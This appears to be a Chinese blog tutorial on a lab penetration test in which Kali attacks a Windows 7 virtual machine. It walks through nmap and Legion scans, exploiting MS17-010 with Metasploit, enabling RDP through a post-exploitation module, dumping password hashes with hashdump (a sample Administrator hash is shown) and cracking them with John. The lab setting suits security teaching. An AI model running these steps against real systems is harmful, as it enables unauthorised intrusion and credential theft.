渗透实验基础教程(完整版):

#江南的江

#每日鸡汤:影响我们人生的绝不仅仅是环境,其实是心态在控制个人的行动和思想。同时,心态也决定了一个人的视野事业和成就,甚至一生。

#初心和目标:成为网络安全达人。。。

渗透实验基础教程(完整版):

<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

实验环境:

攻击机:kali

靶机:Windows(7)

攻击工具:MSF框架、nmap、rdesktop。。。

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

**实验思维:**在开始进行目标渗透时要实现精准渗透首先要明确知道他开放的端口,那么知道端口后根据端口的详细信息进行一对一服务渗透,或者进行漏洞渗透,在完成后进入靶机,进行后渗透操作,比如留后门等

实验开始:

一根据思路要对靶机进行端口或漏洞扫描

那么可以用nmap 可以用 legion(其实也是nmap)等扫描工具

Nmap:

可以看到目标是windows7 开启了23 80 445 3389等端口

那么接着我们用legion 加深扫描的准确性

Legion有自己的ui界面

在这点击后输入ip

开始扫描

和nmap 得到的结果一致还扫描出ms17_010 漏洞

那么我们既可以用服务进行密码爆破,也可以用msf框架进行渗透

这里我们采用后者

Msfconsole

打开工具

Use 0 或者Use 他的完整路径 : exploit/.../.../...

查看参数show options

Yes 为必须配

No 为可以配也可不配

Set rhosts 192.168.227.141

成功后开始进行后渗透

让靶机开启远程连接rdp 服务

run post/windows/manage/enable_rdp

rdesktop 192.168.227.141

不知道密码,好办,在msf中的渗透后的metepreter中用hashdump

获取用户的hash值

Administrator:500:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::

交给john 来

先将hash数值放入一个txt文件中name 随便

那么经过这么一系列的操作这台靶机就是你的了

渗透的方法不止这么一种,重要的是渗透的思维,和目的(不要做违法的事)

比如进入msf 渗透后metepeter 用shell 和netcat建立shell 连接等

相关推荐
安全系统学习38 分钟前
网络安全之SQL RCE漏洞
安全·web安全·网络安全·渗透测试
孞㐑¥1 小时前
Linux之Socket 编程 UDP
linux·服务器·c++·经验分享·笔记·网络协议·udp
2501_915921434 小时前
iOS IPA 混淆实测分析:从逆向视角验证加固效果与防护流程
websocket·网络协议·tcp/ip·http·网络安全·https·udp
2501_915918414 小时前
打造可观测的 iOS CICD 流程:调试、追踪与质量保障全记录
websocket·网络协议·tcp/ip·http·网络安全·https·udp
M4K05 小时前
Linux百度网盘优化三板斧
linux
好奇的菜鸟5 小时前
如何在 Ubuntu 24.04 (Noble) 上使用阿里源
linux·运维·ubuntu
bcbobo21cn5 小时前
初步了解Linux etc/profile文件
linux·运维·服务器·shell·profile
Absinthe_苦艾酒5 小时前
计算机网络(三)传输层TCP
网络·tcp/ip·计算机网络
望获linux6 小时前
【实时Linux实战系列】CPU 隔离与屏蔽技术
java·linux·运维·服务器·操作系统·开源软件·嵌入式软件
0wioiw06 小时前
C#基础(项目结构和编译运行)
linux·运维·服务器